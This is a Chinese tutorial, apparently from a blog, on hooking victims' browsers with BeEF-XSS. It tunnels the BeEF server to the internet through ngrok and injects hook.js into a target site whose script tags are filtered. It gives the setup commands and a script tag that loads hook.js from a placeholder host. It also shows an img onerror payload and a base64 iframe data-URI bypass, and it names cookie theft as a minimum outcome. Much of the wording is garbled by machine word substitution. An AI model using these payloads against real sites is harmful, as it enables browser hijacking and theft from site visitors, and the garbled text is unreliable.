Beef-XSS结构无疑是当今最强壮的浏览器进犯结构, *** 上也存在许多关于它的教程,可是大部分都是根据内网环境下的教育,这就使得进犯作用大打折扣,别的大部分XSS教程仅仅完成一个aler(1)便证明达到了作用,而Beef-XSS要确保完好作用就要加载hook.js文件,在存在必定过滤的情况下,这是有必定难度的。所以便有了今日的文章,期望对咱们有所协助。
0×00 试验东西
kali linux v2.0
beef-xss
sunny-ngrok: http://www.ngrok.cc
0×01 注册tcp署理,并下载客户端进行内网穿透
都是老司机注册这儿就不说了,直接讲怎么注册tcp署理。
点击办理面板左边栏里的地道办理—>注册地道,点击右下角那个免费的点击注册,当然假如你觉得想要安稳的能够挑选付费版:
接下来咱们要对地道进行装备,挑选tcp协议,地道称号和端口号自己填,假如端口号现已被占用,点击确认后会有提示:
留意这儿长途端口号要和本地端口号保持一致,正常情况下能够不必这么填,可是hook.js在发送恳求的时分会在后边主动追加端口号,形成无法成功恳求,所以我就爽性设置成相同的了。
下图这个clientid要保存好等下衔接的时分要用。
接下来便是下载客户端,进行衔接了。在这个地址(http://www.ngrok.cc/download.html)下载相应的客户端版别。
详细指令是:
./sunny clientid 地道id
0×02 自定义监听端口,敞开beef-xss
在发动beef-xss之前,我么们要修正下装备文件中的端口。装备文件方位:/etc/beef-xss/config.yaml。
用vim翻开修正port后边的端口数就好了:
现在咱们直接发动beef-xss就好了,这个就很简略了直接输入beef-xss回车:
接下来咱们只要把hook.js脚本想办法加载到方针网站就能够完成对浏览器的进犯了,最起码get个cookie仍是不成问题的。
0×03 绕过脚本过滤,完成根据beef的xss进犯
一般来说咱们要加载一个js文件只需参加下边一行代码就能够:
script type="text/javascript" src="http://yoururl.com/hook.js">script>
但今日预备的网站对的标签进行了过滤,不能完成直接注入:
在这种情况下想调用个办法仍是很简略的,比方alert(1);只需用img标签的onerror就可完成,代码如下:
img src=x onerror=alert(1); />
可当咱们想要加载的一个js文件时,这样的办法是无法完成的,所以想到了使用iframe的特性,来加密脚本然后完成加载。代码如下:
iframe src="data:text/html;base64,这儿加你的通过base64加密过的脚本代码">iframe>
履行成功,如图咱们控制台现已成功衔接:
至此,就能够进行深化的浏览器进犯了!